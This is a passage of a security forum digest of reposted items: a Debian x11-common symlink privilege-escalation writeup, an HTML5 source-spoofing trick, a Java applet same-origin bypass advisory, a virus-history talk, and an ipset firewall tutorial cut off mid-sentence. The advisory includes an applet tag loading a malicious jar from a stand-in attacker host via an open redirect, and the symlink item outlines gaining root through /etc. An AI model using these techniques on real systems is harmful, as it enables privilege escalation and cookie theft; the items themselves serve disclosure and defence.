Sears.com, etc. Every flaw allows an attacker to sign in as the victim user. We reported our findings to affected companies, and received their acknowledgements in various ways. All the reported flaws, except those discovered very recently, have been fixed. This study shows that the overall security quality of SSO deployments seems worrisome. We hope that the SSO community conducts a study similar to ours, but in a larger scale, to better understand to what extent SSO is insecurely deployed and how to respond to the situation. Keywords— Single-Sign-O Download: http://research.microsoft.com/pubs/160659/websso-final.pdf
  18. [h=2]Debian's x11-common init script weakness (CVE-2012-1093)[/h] The init script issued from the x11-common Debian package is vulnerable to a traditional symlink attack that can lead to a privilege escalation while the package is being installed. This bug isn't very critical (except if you install x11-common for the very first time on a multi-user system), but I wanted to leave a note about it because the vulnerable code is quite common and could be found in your own scripts. The code creates two temporary directories ($SOCKET_DIR and $ICE_DIR) in the following manner: $ cat -n /etc/init.d/x11-common [...] 11 set -e [...] 33 if [ -e $SOCKET_DIR ] && [ ! -d $SOCKET_DIR ]; then 34 mv $SOCKET_DIR $SOCKET_DIR.$$ 35 fi 36 mkdir -p $SOCKET_DIR 37 chown root:root $SOCKET_DIR 38 chmod 1777 $SOCKET_DIR A symlink attack looks impossible here as the script uses the "set -e" built-in command (the script aborts immediately when a command with a non-zero status is returned). I mean, if $SOCKET_DIR is a symlink, we could think that the "mkdir -p" command at line 36 would fail (at least, this behavior was expected by developers). But this is wrong, "mkdir" with the "-p" option returns zero if the target already exits: $ man mkdir [...] -p, --parents no error if existing, make parent directories as needed So the only thing to exploit this is to place a link that doesn't match the condition at line 33 (i.e. a symlink that point to an existing directory), and wait for the package to be installed. In this case, a symlink to the "/etc" directory would allow the user to set the 1777 permission on this directory and create the "/etc/ld.preload" file in order to load malicious libraries into a set-uid process. x11-common root exploit PoC I reported this bug, it was fixed with a very nice patch from jcristau in the version 1:7.6+12 of the x11-common package. Thanks to him. Debian bug report #661627 Sursa: Security
  19. Exclusive - Source Code Spoofing with HTML5 and the LTO Character Article Written by John Kurlak for The Hacker News,He is senior studying Computer Science at Virginia Tech. Today John will teach us that How to Spoof the Source Code of a web page. For example,Open Source and Try to View Source Code of the Page ;-) Can you View ?? About eight months ago, I learned about HTML5’s new JavaScript feature, history.replaceState(). The history.replaceState() function allows a site developer to modify the URL of the current history entry without refreshing the page. For example, I could use the history.replaceState() function to change the URL of my page in the address bar from “http://www.kurlak.com/example.html” to “http://www.kurlak.com/example2.html” When I first learned of the history.replaceState() function, I was both skeptical and curious. First, I wanted to see if history.replaceState() supported changing the entire URL of a page, including the hostname. Fortunately, the developers were smart enough to prevent that kind of action. Next, I noticed that if I viewed the source code of a page after replacing the URL, it attempted to show the source code of the new page. I started brainstorming ways I could make the URL look the same but have a different underlying representation. Such a scenario would make it so that I could “hide” the source code of a page by masking it with another page. I remembered encountering a special Unicode character some time back that reversed all text that came after it. That character is called the “right to left override” (RTO) and can be produced with decimal code 8238. I tried to create an HTML page, “source.html,” that would use history.replaceState() to replace the URL of the page with: [RTO] + “lmth.ecruos” (the reversed text of “source.html”). When the browser rendered the new URL, the RTO character reversed the letters after it, making the browser display “source.html” in the address bar. However, when I went to view the source of the web page, my browser tried to view the source of “‮lmth.ecruos” instead (the characters, “‮,” are the ASCII representation of the hex codes used to represent the RTO character). Thus, I created a page, “‮lmth.ecruos” and put some “fake” source code inside. Now, when I went to “source.html,” the URL was replaced with one that rendered the same, and when I viewed the source of the page, it showed my “fake” source code. The code I used for “source.html” was: However, there was a downfall: if the user tried to type after the RTO character in the address bar, his or her text would show up backwards, a clear indication that something strange was going on. I brainstormed additional solutions. I soon found that there was also a “left to right override” (LTO) character. I discovered that placing the LTO character within text that is already oriented left to right does not do anything. I decided to add the LTO character to the end of my URL and used the following code: Then, I simply had to create “source.htmlâ€*” and put my “fake” source code in it. It worked! Now the user could type normally without seeing anything funny. However, this new code still has two downfalls. The first downfall is that the script appears to work only for Google Chrome (I tested the script in Chrome 17.0.963.79 m). Firefox 11 escapes the RTO character, so the user sees “%E2%80%AElmth.ecruos” in the URL bar instead of “source.html.” (I have had reports, however, that the “exploit” works in Firefox 11 on Linux. I have not yet confirmed those reports). Internet Explorer 9 does not yet support history.replaceState(), but apparently Internet Explore 10 will. Opera 11 and Safari 5 both show “source.html” in the address bar, but when I go to view the page source, both browsers bring up the code for the original “source.html.” The second downfall is that if the user tries to refresh the page, he or she will be taken to the fake HTML page. As far as I know, there is no sure way to prevent this side effect. Finally, I would like to point out that this “exploit” is just a cool trick. It cannot be used to prevent someone from retrieving the source code of a web page. If a browser can access a page’s source code, a human can access that page’s source code. Maybe someone else can think of a more interesting use of the trick. I hope you like it! You can download both sample files Here Submitted By : John Kurlak Website: http://www.kurlak.com Sursa: Exclusive - Source Code Spoofing with HTML5 and the LTO Character | The Hacker News (THN)
  20. [h=2]Java Applet Same-Origin Policy Bypass via HTTP Redirect[/h] [h=3]Summary[/h] Java 1.7 and Java 1.6 Update 27 and below do not properly enforce the same-origin policy for applets which are loaded via URLs that redirect. A malicious user can take advantage of this flaw to attack websites which redirect to third party content. This issue was patched in both Java 7 and Java 6 as part of the October 2011 Critical Patch Update. This issue has been assigned CVE-2011-3546. [h=3]What is the same-origin policy[/h] From Wikipedia: In computing, the same origin policy is an important security concept for a number of browser-side programming languages, such as JavaScript. The policy permits scripts running on pages originating from the same site to access each other’s methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites. The origin for a Java applet is the hostname of the website where the applet is served from. So, for example, if I upload an applet to http://example.com/applet.jar, that applet’s origin is example.com. We care about the origin for security reasons: the same-origin policy ensures that an applet is only allowed to make HTTP requests back to the domain from which it originates (or to another domain which resolves to the same IP address, but we can ignore that behavior here). [h=3]So, where’s the security vulnerability?[/h] Under certain conditions, the JRE did not correctly determine the origin of an applet. Specifically, when loading an applet via a URL that performed an HTTP redirect, the Java plugin used the original source of the redirect, not the final destination, as the applet’s origin. If you’re confused, an example might help to illustrate things. Lets first start by imagining a website, example.com, that contains an open redirect. In other words, imagine that browsing to IANA — Example domains redirects the user to http://www.google.com using a 301 or 302 redirect. Now, lets consider an attacker who controls the domain evildomain.com. This is what the attacker does: Writes a malicious Java applet that accesses http://example.com Uploads that applet to http://evildomain.com/evil.jar Constructs a redirect from http://example.com to the malicious applet (http://example.com/redirect.php?url=http://evildomain.com/evil.jar) Creates a malicious page anywhere on the Internet containing the following HTML: ? [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 [/TD] [TD=class: code]<applet code="CSRFApplet.class" archive="http://example.com/redirect.php?url=http://evildomain.com/evil.jar" width="300" height="300"></applet> [/TD] [/TR] [/TABLE] So what happens when a user visits that page? Well, lets first think about what we would want to happen: The user loads the page The user’s browser fetches the Java applet. The Java applet executes. The Java applets tries to access http://example.com but fails because the applet was served up by http://evildomain.com, violating the same-origin policy. Now, here’s what actually happened: The user loads the page The user’s browser fetches the Java applet. The Java applet executes. The Java applets tries to access http://example.com AND SUCCEEDS !!! That behavior is dangerous for websites that redirect to third party content: since HTTP requests made via Java applets inherit a user’s cookies from the browser (minus those marked as HttpOnly), an attacker who exploits this vulnerability is able to steal sensitive information or perform a CSRF attack against a targeted website. Any users who have not upgraded to the latest version of Java are vulnerable to attack. [h=3]How to protect your website[/h] Java applets are client-side technology, but this vulnerability has a very real impact on website owners. Aside from waiting for your users to upgrade to the latest version of Java, here are some steps you can take to protect your site: [h=4]1. Block requests containing Java’s user-agent from accessing your redirects[/h] This solution is fairly simple. By denying requests made by Java applets to redirect scripts on your site, you can prevent a malicious applet from being loaded. The UAs you’ll want to block contain the string “Java/” (without the quotation marks). [Note: Blocking that string may be overly broad: I haven't researched whether other software claims to be Java. I'll update this post if I'm made aware of any conflicts.] [h=4]2. Use HttpOnly cookies[/h] Java is not able to read or make requests with cookies that are marked HttpOnly. As a result, this attack can not be used to access or make requests to the authenticated portion of any site that uses HttpOnly cookies. [h=4]3. Don’t redirect to third party content[/h] Open redirects are considered to be problematic for a number of reasons (including their use in phishing attacks). If at all possible, you should avoid them entirely, or heavily restrict the locations that they can redirect to. [h=3]Disclosure Timeline[/h] December 28th, 2010: Vulnerability discovered January 10th, 2011: Built two proofs of concept involving major websites (will not be disclosed publicly) January 11th, 2011: Email sent to vendor. Disclosed full details of vulnerability, including proofs of concept January 12th, 2011: Vendor acknowledges receipt of email January 25th, 2011: Followup email sent to vendor, inquiring about status January 26th, 2011: Vendor replies: issue is still being investigated February 15th, 2011: A Java SE Critical Patch Update is released March 15th, 2011: Followup email sent to vendor, inquiring about status March 18th, 2011: Vendor replies: issue is still being investigated March 24th, 2011, 5:44 AM: Vendor sends automated status report email that fails to mention this vulnerability March 24th, 2011, 8:04 AM: Followup email sent to vendor, inquiring about status March 24th, 2011, 4:44 PM: Vendor acknowledges vulnerability, plans to address in a future update April 25th, 2011: Vendor sends automated status report email that fails to mention this vulnerability May 23rd, 2011, 9:44 AM: Followup email sent to vendor inquiring about the status of a fix May 23rd, 2011, 2:24 PM: Vendor replies: plans to address vulnerability in October 2011 Java Critical Patch Update May 24th, 2011: Vendor sends automated status report email that fails to mention this vulnerability June 7th, 2011: A Java SE Critical Patch Update is released June 23rd, 2011: Vendor sends automated status report email that fails to mention this vulnerability July 22nd, 2011, 5:24 AM: Vendor sends automated status report email that fails to mention this vulnerability July 22nd, 2011, 8:04 AM: Followup email sent to vendor, inquiring about status July 22nd, 2011, 1:33 PM: Vendor replies, apologizes for not including vulnerability in status report. Reiterates that a fix for the vulnerability is targeted for the October 2011 Java Critical Patch Update July 28th, 2011: Java 7 is released. Testing reveals the vulnerability has not been patched. Email with vendor confirms. August 23rd, 2011: Vendor sends automated status report email. Vulnerability is now included and is marked “Issue fixed in main codeline, scheduled for a future CPU” September 23rd, 2011: Vendor sends automated status report email. Vulnerability is marked “Issue fixed in main codeline, scheduled for a future CPU” October 14th, 2011: Vendor sends out email confirming that vulnerability will be patched in CPU to be released on October 18th. October 18th, 2011: Java 6 Update 29 and Java 7 Update 1 are released, patching the vulnerability. [h=3]Anything else?[/h] It appears Firefox was vulnerable to a similar attack back in 2007: The blogger at beford.org noted that redirects confused Mozilla browsers about the true source of the jar: content: the content was wrongly considered to originate with the redirecting site rather than the actual source. This meant that an XSS attack could be mounted against any site with an open redirect even if it didn’t allow uploads. A published proof-of-concept demonstrates stealing the GMail contact list of users logged-in to GMail. It also appears that people have been aware of similar attacks against Java for a while now. I stumbled across a post on http://sla.ckers.org/ that mentioned using redirects to JARs as a way to steal cookies. I believe the “fix” referred to in the post (which only covers cookie stealing) was made in response to this vulnerability from 2010. If you have any questions about the vulnerability, please feel free to leave them in the comments! Sursa: https://nealpoole.com/blog/2011/10/java-applet-same-origin-policy-bypass-via-http-redirect/
  21. Penetration testing business From: Krzysztof Marczyk <krzysztof.marczyk () software com pl> Date: Tue, 20 Mar 2012 17:08:47 +0100 PenTest Magazine has released a first issue of PenTest Market, *ONE AND ONLY * magazine about penetration testing business! PenTest Market 01/2012 | Issues | PenTest Magazine If you: - are IT Security related company owner - are IT professional looking for a job - are planning on becoming a IT Security professional - want to know the IT Security business from inside - are planning on starting your own IT Security company - want to know what are the clients expectations and demands from IT Security companies ...it means that this magazine is just for you! Don't wait, and see it in our brand new PenTest Market! PenTest Market 01/2012 | Issues | PenTest Magazine If you want to take part in creation of this magazine or have any questions, please contact us at krzysztof.marczyk () software com pl We will respond asap. Sursa: Full Disclosure: Penetration testing business
  22. [h=1]The History and the Evolution of Computer Viruses: 1986-1991 [/h] Posted by david b. on March 19, 2012 CRO at F-Secure Mikko Hypponen provides a captivating insight into the onset and advancement of computer infections in his talk at Defcon 19 called “The History and the Evolution of Computer Viruses”. This part of the speech is dedicated to a detailed description of the first viruses that came on stage in 1986 – 1991, such as the ‘Brain’, ‘Omega’ and others. My name is Mikko Hypponen, and we’ll be doing the first session here talking about the history and evolution of computer viruses. I am from Finland. I’ve been playing around with viruses for the past 20 years, a little bit more than that. And we are at an interesting point in history, and I’ll get back to that in just a moment, and that’s the main reason why I wanted to speak about the whole evolution of where we’ve been, where we are right now, and where we will be going with malware, trojans, backdoors, worms, viruses. Now, all those years I’ve been working with the same company – F-Secure. So, we run antivirus labs around the world. And of course in the early days our operations were very small. A couple of guys in the lab analyzed everything by hand, reverse-engineered the code, built detection, tried to figure out how they spread. Today, all professional antivirus companies run massive labs around the world with automation, because we are, on typical day right now, receiving some range of 100,000 to 200,000 samples coming into our systems. So, obviously we can’t keep up with normal human power any more. [h=3]1986 – 1991[/h] But we’ll start from ‘Brain’. So, what you’re seeing on the image here is an original 5.25-inch floppy disk infected by ‘Brain’. Last year, around November, we were cleaning our labs and in one of the cupboards, we found this box which was full of 5.25-inch floppy disks. And that box had basically the first 100 PC viruses in it, including this ‘Brain.A’. And ‘Brain.A’ is considered to be – and is known to be – the first PC virus in history. That’s the first PC virus. We’ve seen before 1986, for example, some Apple II viruses and stuff like that. But this is actually important because we are still finding PC viruses today, right? So, I did the math, 1986 – 2011, that’s 25. It’s gonna be 25 years. And we had a meeting in the lab. Okay, what should we do about this? It’s gonna be 25 years since the first PC virus. And our media team thought that we should have some sort of social media campaign to raise awareness of computer security. And I thought that that’s boring, what about if I try to go and find the guys who wrote ‘Brain’ 25 years ago. And if I find them, I’ll speak with them, and I ask them, like, you know, why did you do it, what were you thinking, and what do you think about what you started 25 years ago. It’s gonna be 25 years since the first PC virus. And actually, doing that – like trying to find virus authors 25 years later – typically would be impossible. In case of ‘Brain’, it actually isn’t, and I’ll show you. Here is the actual boot code of a floppy infected by ‘Brain’. So, if you just take a closer look, you’ll see some text inside here (see image) saying ‘Welcome to the Dungeon, 1986, Basit and Amjad’, and Basit and Amjad are first names. They are Pakistani first names. Then there is a phone number and a street address. So, in February, I went to the town of Lahore in Pakistan, which was the address listed inside the ‘Brain’ code. So I knocked on the door. You wanna guess who was at the door? Basit and Amjad. They are still there. Nowadays these guys run an Internet operator, and it is a telco operator for the city of Lahore, and the company is called ‘Brain Telecommunications’. So, we had a very interesting chat about, okay, why did you do it, and what were you thinking, and…Their explanation was that it was a proof of concept. These guys had a background in Unix1 world. They had been running different mainframe systems in the early 1980s, when they were like in their late teens – early 20s. And then PC DOS2 came around, in 1985. And they hated it. They thought that it wasn’t secure – and obviously, it wasn’t. And they decided to prove it by writing a virus. And that’s what they did. And of course they had no idea that virus would go around the world, infect computers in more than 100 countries around the world, but that’s what it did. They also started getting phone calls from around the world, from people who had been infected by the virus and all that. They really weren’t expecting that to happen, but of course it went global, became a global problem. 1986 – Brain 1987 – Stoned 1987 – Cascade 1989 – Yankee Doodle 1989 – Dark Avenger 1990 – Form ‘Brain’ was a very typical example of the early viruses we used to see back then. The motive wasn’t anything very concrete. These guys wanted to try something out. They wanted to do something that would replicate and go around the world. And of course, around those days (1986, 1987, 1988) viruses like ‘Brain’ and ‘Stoned’ and ‘Cascade’, and ‘Yankee Doodle’ were all basically the same thing. They were spreading on floppy disks, infecting boot sectors, so you would have infected floppy inside your computer, you boot from the floppy – you get infected, and every other floppy you put in after that gets infected as well. Or file infectors like ‘Yankee Doodle’ which would infect DOS .COM files, and then when you share files, well, it spreads from one computer to another. What we have to remember is that in 1986 we didn’t have networks. I mean normal computers, PC computers, were not connected to each other in any way. In fact, most computers didn’t have a hard drive. They would typically have two floppy drives only, right. So, if you wanted to move data around you had to put it on a floppy, there were no other means of doing it. And that’s why floppy-based infectors spread so quickly. In 1986 computers were not connected to each other and most of them didn’t have hard drives, so floppy-based infectors spread quickly. Many of these viruses at that time were also, in one way or another, visual. What I mean by that is that you would typically know that you are infected. And one good example of that is the ‘Omega’ virus. This one is not so important or pointed in any history books or anywhere actually, to anyone else except to me. But it’s important to me because it’s the first virus I analyzed. In September 1991, we had a customer case of a large company, actually a telco, where they had damage on their computers and they were suspecting a virus, and they sent us a sample. And I got assigned to look at the sample, because around that time in F-Secure, I was the only guy who would do reverse-engineering in assembly language. Even that I actually had never done on PC, I had background with Commodore 643 and doing assembly there, but, you know, I decided to do that. And I printed out the code, spent a couple of days trying to go through and understand how it works, and learning the interrupts of DOS system and all that. And I did it, I decoded it. I actually didn’t have a spare PC I could infect at that time, so I actually couldn’t run the code, I was just reading it, trying to figure out what it does. And one of the things that I thought it did, just looking at the code, was that it would be displayed on 13th of the month. If it was a Friday, it would activate and display one character: character number 232, I believe. And I looked up that character and that is the ‘Omega’ sign. So, I named the virus ‘Omega’. That’s the first virus I ever named. And the name stuck, if you google around, you will still find this virus as the ‘Omega’ virus. And that actually started a tradition. In our days, in our company, once you’ve been 10 years with the company, you’ll get a genuine Swiss OMEGA watch. So, I should have named the virus ‘Ferrari’. To be continued… 1 – Unix is a term generally used to refer to those multitasking, multi-user operating systems which use this term as the entirety of or as part of their official names, including all of the original versions of UNIX that were developed at Bell Labs. 2 – PC DOS (full name: The IBM Personal Computer Disk Operating System) is a DOS system for the IBM Personal Computer and compatibles, manufactured and sold by IBM from the 1980s to the 2000s. 3 – Commodore 64 was an 8-bit home computer manufactured by the now defunct Commodore International company in the time frame 1982-1994. Sursa: The History and the Evolution of Computer Viruses: 1986-1991 | Privacy PC
  23. Am adaugat 3 noi sub-categorii categoriei "Blackhat SEO si monetizare".
  24. [h=3]Build Your Own Ubuntu based GNU/Linux Distribution - Ubuntu Builder[/h] Posted by Nikesh Jauhari Ubuntu Builder is a simple tool to build your own distribution. It allows to download, extract, customize in many ways and rebuild your Ubuntu images. You can customize i386 and amd64 images. Ubuntu Builder Installation: You can install Ubuntu Builder by downloading the latest version package (here) and installing it using Ubuntu software center by double-clicking on the deb file. After successful installation, you can open the Ubuntu Builder from Unity 'Dash" Clicking on 'Select ISO' will open an input box that will allow you to select the ISO image to be extracted for customization. You can select an ISO image from your local system in or download a Ubuntu Mini Remix which offers ISO image with minimal packages for customization. To do that, click 'Get Ubuntu', choose the release, location, and click Download. Sursa: Build Your Own Ubuntu based GNU/Linux Distribution - Ubuntu Builder | Linux Poison
  25. [h=1]Advanced Firewall Configurations with ipset[/h]Mar 19, 2012 By Henry Van Styn iptables is the user-space tool for configuring firewall rules in the Linux kernel. It is actually a part of the larger netfilter framework. Perhaps because iptables is the most visible part of the netfilter framework, the framework is commonly referred to collectively as iptables. iptables has been the Linux firewall solution since the 2.4 kernel. ipset is an extension to iptables that allows you to create firewall rules that match entire "sets" of addresses at once. Unlike normal iptables chains, which are stored and traversed linearly, IP sets are stored in indexed data structures, making lookups very efficient, even when dealing with large sets. Besides the obvious situations where you might imagine this would be useful, such as blocking long lists of "bad" hosts without worry of killing system resources or causing network congestion, IP sets also open up new ways of approaching certain aspects of firewall design and simplify many configuration scenarios. In this article, after quickly discussing ipset's installation requirements, I spend a bit of time on iptables' core fundamentals and concepts. Then, I cover ipset usage and syntax and show how it integrates with iptables to accomplish various configurations. Finally, I provide some detailed and fairly advanced real-world examples of how ipsets can be used to solve all sorts of problems. With significant performance gains and powerful extra features—like the ability to apply single firewall rules to entire groups of hosts and networks at once—ipset may be iptables' perfect match. Because ipset is just an extension to iptables, this article is as much about iptables as it is about ipset, although the focus is those features relevant to understanding and using ipset. [h=3]Getting ipset[/h] ipset is a simple package option in many distributions, and since plenty of other installation resources are available, I don't spend a whole lot of time on that here. The important thing to understand is that like iptables, ipset consists of both a user-space tool and a kernel module, so you need both for it to work properly. You also need an "ipset-aware" iptables binary to be able to add rules that match against sets. Start by simply doing a search for "ipset" in your distribution's package management tool. There is a good chance you'll be able to find an easy procedure to install ipset in a turn-key way. In Ubuntu (and probably Debian), install the ipset and xtables-addons-source packages. Then, run module-assistant auto-install xtables-addons, and ipset is ready to go in less than 30 seconds. If your distro doesn't have built-in support, follow the manual installation procedure listed on the ipset home page (see Resources) to build from source and patch your kernel and iptables. The versions used in this article are ipset v4.3 and iptables v1.4.9. [h=3]iptables Overview[/h] In a nutshell, an iptables firewall configuration consists of a set of built-in "chains" (grouped into four "tables") that each comprise a list of "rules". For every packet, and at each stage of processing, the kernel consults the appropriate chain to determine the fate of the packet. Chains are consulted in order, based on the "direction" of the packet (remote-to-local, remote-to-remote or local-to-remote) and its current "stage" of processing (before or after "routing"). See Figure 1. Figure 1. iptables Built-in Chains Traversal Order When consulting a chain, the packet is compared to each and every one of the chain's rules, in order, until it matches a rule. Once the first match is found, the action specified in the rule's target is taken. If the end of the chain is reached without finding a match, the action of the chain's default target, or policy, is taken. A chain is nothing more than an ordered list of rules, and a rule is nothing more than a match/target combination. A simple example of a match is "TCP destination port 80". A simple example of a target is "accept the packet". Targets also can redirect to other user-defined chains, which provide a mechanism for the grouping and subdividing of rules, and cascading through multiple matches and chains to arrive finally at an action to be taken on the packet. Every iptables command for defining rules, from the very short to the very long, is composed of three basic parts that specify the table/chain (and order), the match and the target (Figure 2). Figure 2. Anatomy of an iptables Command To configure all these options and create a complete firewall configuration, you run a series of iptables commands in a specific order. iptables is incredibly powerful and extensible. Besides its many built-in features, iptables also provides an API for custom "match extensions" (modules for classifying packets) and "target extensions" (modules for what actions to take when packets match). [h=3]Enter ipset[/h] ipset is a "match extension" for iptables. To use it, you create and populate uniquely named "sets" using the ipset command-line tool, and then separately reference those sets in the match specification of one or more iptables rules. A set is simply a list of addresses stored efficiently for fast lookup. Take the following normal iptables commands that would block inbound traffic from 1.1.1.1 and 2.2.2.2: iptables -A INPUT -s 1.1.1.1 -j DROP iptables -A INPUT -s 2.2.2.2 -j DROP The match specification syntax -s 1.1.1.1 above means "match packets whose source address is 1.1.1.1". To block both 1.1.1.1 and 2.2.2.2, two separate iptables rules with two separate match specifications (one for 1.1.1.1 and one for 2.2.2.2) are defined above. Alternatively, the following ipset/iptables commands achieve the same result: ipset -N myset iphash ipset -A myset 1.1.1.1 ipset -A myset 2.2.2.2 iptables -A INPUT -m set --set myset src -j DROP The ipset commands above create a new set (myset of type iphash) with two addresses (1.1.1.1 and 2.2.2.2). The iptables command then references the set with the match specification -m set --set myset src, which means "match packets whose source header matches (that is, is contained within) the set named myset". The flag src means match on "source". The flag dst would match on "destination", and the flag src,dst would match on both source and destination. In the second version above, only one iptables command is required, regardless of how many additional IP addresses are contained within the set. Although this example uses only two addresses, you could just as easily define 1,000 addresses, and the ipset-based config still would require only a single iptables rule, while the previous approach, without the benefit of ipset, would require 1,000 iptables rules. [h=3]Set Types[/h] Each set is of a specific type, which defines what kind of values can be stored in it (IP addresses, networks, ports and so on) as well as how packets are matched (that is, what part of the packet should be checked and how it's compared to the set). Besides the most common set types, which check the IP address, additional set types are available that check the port, the IP address and port together, MAC address and IP address together and so on. Each set type has its own rules for the type, range and distribution of values it can contain. Different set types also use different types of indexes and are optimized for different scenarios. The best/most efficient set type depends on the situation. The most flexible set types are iphash, which stores lists of arbitrary IP addresses, and nethash, which stores lists of arbitrary networks (IP/mask) of varied sizes. Refer to the ipset man page for a listing and description of all the set types (there are 11 in total at the time of this writing). The special set type setlist also is available, which allows grouping several sets together into one. This is required if you want to have a single set that contains both single IP addresses and networks, for example. [h=3]Advantages of ipset[/h] Besides the performance gains, ipset also allows for more straightforward configurations in many scenarios. If you want to define a firewall condition that would match everything but packets from 1.1.1.1 or 2.2.2.2 and continue processing in mychain, notice that the following does not work: iptables -A INPUT -s ! 1.1.1.1 -g mychain iptables -A INPUT -s ! 2.2.2.2 -g mychain If a packet came in from 1.1.1.1, it would not match the first rule (because the source address is 1.1.1.1), but it would match the second rule (because the source address is not 2.2.2.2). If a packet came in from 2.2.2.2, it would match the first rule (because the source address is not 1.1.1.1). The rules cancel each other out—all packets will match, including 1.1.1.1 and 2.2.2.2. Although there are other ways to construct the rules properly and achieve the desired result without ipset, none are as intuitive or straightforward: ipset -N myset iphash ipset -A myset 1.1.1.1 ipset -A myset 2.2.2.2 iptables -A INPUT -m set ! --set myset src -g mychain In the above, if a packet came in from 1.1.1.1, it would not match the rule (because the source address 1.1.1.1 does match the set myset). If a packet came in from 2.2.2.2, it would not match the rule (because the source address 2.2.2.2 does match the set myset). Although this is a simplistic example, it illustrates the fundamental benefit associated with fitting a complete condition in a single rule. In many ways, separate iptables rules are autonomous from each other, and it's not always straightforward, intuitive or optimal to get separate rules to coalesce into a single logical condition, especially when it involves mixing normal and inverted tests. ipset just makes life easier in these situations. Another benefit of ipset is that sets can be manipulated independently of active iptables rules. Adding/changing/removing entries is a trivial matter because the information is simple and order is irrelevant. Editing a flat list doesn't require a whole lot of thought. In iptables, on the other hand, besides the fact that each rule is a significantly more complex object, the order of rules is of fundamental importance, so in-place rule modifications are much heavier and potentially error-prone operations. [h=3]Excluding WAN, VPN and Other Routed Networks from the NAT—the Right Way[/h] Outbound NAT (SNAT or IP masquerade) allows hosts within a private LAN to access the Internet. An appropriate iptables NAT rule matches Internet-bound packets originating from the private LAN and replaces the source address with the address of the gateway itself (making the gateway appear to be the source host and hiding the private "real" hosts behind it). NAT automatically tracks the active connections so it can forward return packets back to the correct internal host (by changing the destination from the address of the gateway back to the address of the original internal host). Here is an example of a simple outbound NAT rule that does this, where 10.0.0.0/24 is the internal LAN: iptables -t nat -A POSTROUTING \ -s 10.0.0.0/24 -j MASQUERADE This rule matches all packets coming from the internal LAN and masquerades them (that is, it applies "NAT" processing). This might be sufficient if the only route is to the Internet, where all through traffic is Internet traffic. If, however, there are routes to other private networks, such as with VPN or physical WAN links, you probably don't want that traffic masqueraded. One simple way (partially) to overcome this limitation is to base the NAT rule on physical interfaces instead of network numbers (this is one of the most popular NAT rules given in on-line examples and tutorials): iptables -t nat -A POSTROUTING \ -o eth0 -j MASQUERADE This rule assumes that eth0 is the external interface and matches all packets that leave on it. Unlike the previous rule, packets bound for other networks that route out through different interfaces won't match this rule (like with OpenVPN links). Although many network connections may route through separate interfaces, it is not safe to assume that all will. A good example is KAME-based IPsec VPN connections (such as Openswan) that don't use virtual interfaces like other user-space VPNs (such as OpenVPN). Another situation where the above interface match technique wouldn't work is if the outward facing ("external") interface is connected to an intermediate network with routes to other private networks in addition to a route to the Internet. It is entirely plausible for there to be routes to private networks that are several hops away and on the same path as the route to the Internet. Designing firewall rules that rely on matching of physical interfaces can place artificial limits and dependencies on network topology, which makes a strong case for it to be avoided if it's not actually necessary. As it turns out, this is another great application for ipset. Let's say that besides acting as the Internet gateway for the local private LAN (10.0.0.0/24), your box routes directly to four other private networks (10.30.30.0/24, 10.40.40.0/24, 192.168.4.0/23 and 172.22.0.0/22). Run the following commands: ipset -N routed_nets nethash ipset -A routed_nets 10.30.30.0/24 ipset -A routed_nets 10.40.40.0/24 ipset -A routed_nets 192.168.4.0/23 ipset -A routed_nets 172.22.0.0/22 iptables -t nat -A POSTROUTING \ -s 10.0.0.0/24 \ -m set ! --set routed_nets dst \ -j MASQUERADE As you can see, ipset makes it easy to zero in on exactly what you want matched and what you don't. This rule would masquerade all traffic passing through the box from your internal LAN (10.0.0.0/24) except those packets bound for any of the networks in your routed_nets set, preserving normal direct IP routing to those networks. Because this configuration is based purely on network addresses, you don't have to worry about the types of connections in place (type of VPNs, number of hops and so on), nor do you have to worry about physical interfaces and topologies. This is how it should be. Because this is a pure layer-3 (network layer) implementation, the underlying classifications required to achieve it should be pure layer-3 as well. [h=3]Limiting Certain PCs to Have Access Only to Certain Public Hosts[/h] Let's say the boss is concerned about certain employees playing on the Internet instead of working and asks you to limit their PCs' access to a specific set of sites they need to be able to get to for their work, but he doesn't want this to affect all PCs (such as his). To limit three PCs (10.0.0.5, 10.0.0.6 and 10.0.0.7) to have outside access only to worksite1.com, worksite2.com and worksite3.com, run the following commands: ipset -N limited_hosts iphash ipset -A limited_hosts 10.0.0.5 ipset -A limited_hosts 10.0.0.6 ipset -A limited_hosts 10.0.0.7 ipset -N allowed_sites iphash ipset -A allowed_sites worksite1.com ipset -A allowed_sites worksite2.com ipset -A allowed_sites worksite3.com iptables -I FORWARD \ -m set --set limited_hosts src \ -m set ! --set allowed_sites dst \ -j DROP This example matches against two sets in a single rule. If the source matches limited_hosts and the destination does not match allowed_sites, the packet is dropped (because limited_hosts are allowed to communicate only with allowed_sites). Note that because this rule is in the FORWARD chain, it won't affect communication to and from the firewall itself, nor will it affect internal traffic (because that traffic wouldn't even involve the firewall). [h=3]Blocking Access to Hosts for All but Certain PCs (Inverse Scenario)[/h] Let's say the boss wants to block access to a set of sites across all hosts on the LAN except his PC and his assistant's PC. For variety, in this example, let's match the boss and assistant PCs by MAC address instead of IP. Let's say the MACs are 11:11:11:11:11:11 and 22:22:22:22:22:22, and the sites to be blocked for everyone else are badsite1.com, badsite2.com and badsite3.com. In lieu of using a second ipset to match the MACs, let's utilize multiple iptables commands with the MARK target to mark packets for processing in subsequent rules in the same chain: ipset -N blocked_sites iphash ipset -A blocked_sites badsite1.com ipset -A blocked_sites badsite2.com ipset -A blocked_sites badsite3.com iptables -I FORWARD -m mark --mark 0x187 -j DROP iptables -I FORWARD \ -m mark --mark 0x187 \ -m mac --mac-source 11:11:11:11:11:11 \ -j MARK --set-mark 0x0 iptables -I FORWARD \ -m mark --mark 0x187 \ -m mac --mac-source 22:22:22:22:22:22 \ -j MARK --set-mark 0x0 iptables -I FORWARD \ -m set --set blocked_sites dst \ -j MARK --set-mark 0x187 As you can see, because you're not using ipset to do all the matching work as in the previous example, the commands are quite a bit more involved and complex. Because there are multiple iptables commands, it's necessary to recognize that their order is vitally important. Notice that these rules are being added with the -I option (insert) instead of -A (append). When a rule is inserted, it is added to the top of the chain, pushing all the existing rules down. Because each of these rules is being inserted, the effective order is reversed, because as each rule is added, it is inserted above the previous one. The last iptables command above actually becomes the first rule in the FORWARD chain. This rule matches all packets with a destination matching the blocked_sites ipset, and then marks those packets with 0x187 (an arbitrarily chosen hex number). The next two rules match only packets from the hosts to be excluded and that are already marked with 0x187. These two rules then set the marks on those packets to 0x0, which "clears" the 0x187 mark. Finally, the last iptables rule (which is represented by the first iptables command above) drops all packets with the 0x187 mark. This should match all packets with destinations in the 